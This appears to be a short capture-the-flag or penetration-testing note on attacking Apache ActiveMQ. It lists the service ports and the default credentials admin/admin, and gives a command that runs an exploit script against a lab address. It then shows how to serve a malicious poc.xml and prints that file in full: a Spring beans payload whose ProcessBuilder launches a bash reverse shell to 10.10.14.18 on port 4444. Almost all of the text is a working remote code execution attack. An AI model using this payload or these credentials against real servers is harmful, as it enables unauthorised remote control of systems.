61616, 61613, 61614, 1883, 8883, 5672, 8161 - Apache ActiveMQ
Default creds
admin \ admin
python exploit.py -i 10.10.11.243 -u http://10.10.14.18/poc.xml
python3 -m http.server 80
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>bash -i >& /dev/tcp/10.10.14.18/4444 0>&1</value>
</list>
</constructor-arg>
</bean>
</beans>